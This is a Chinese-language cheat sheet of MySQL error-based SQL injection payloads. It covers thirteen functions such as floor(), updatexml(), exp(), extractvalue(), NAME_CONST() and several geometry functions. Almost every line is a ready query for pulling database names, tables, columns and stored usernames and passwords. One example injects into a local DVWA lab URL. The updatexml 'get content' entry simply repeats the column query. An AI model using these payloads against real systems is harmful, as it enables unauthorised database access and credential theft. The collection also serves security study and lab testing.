mysql注入 join_mysql报错注入

常见报错函数

1. floor()

获取数据库

mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand()*2))) name from information_schema.tables group by name;

获取表名

mysql> select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

获取字段名

mysql> select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

获取内容

mysql> select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

2. UpdateXml()

获取表名

mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);

获取字段

mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);

获取内容

mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);

3. exp()

and exp(~(select * from (select user() ) a) );

得到表名

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));

得到列名

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));

检索数据

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));

一蹴而就

exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))

http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#

4. extractvalue() (有长度限制,最长32位)

获取表名

mysql> select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1)));

获取字段

mysql> select extractvalue(1, concat(0x5c,(select password from users limit 1,1)));

5. NAME_CONST()

`and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)`

6. bigint()

select !(select * from (select user())x) -(ps:这是减号) ~0

//bigint超出范围；~0是对0逐位取反，很大的版本在5.5.5及其以上

可以参考文章bigint溢出文章http://www.cnblogs.com/lcamry/articles/5509112.html

7. join()

`select * from(select * from mysql.user a join mysql.user b using(Host))c;(爆列名贼好用)`

8. geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

9. multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

10. polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

11. multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

12. linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

13. multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));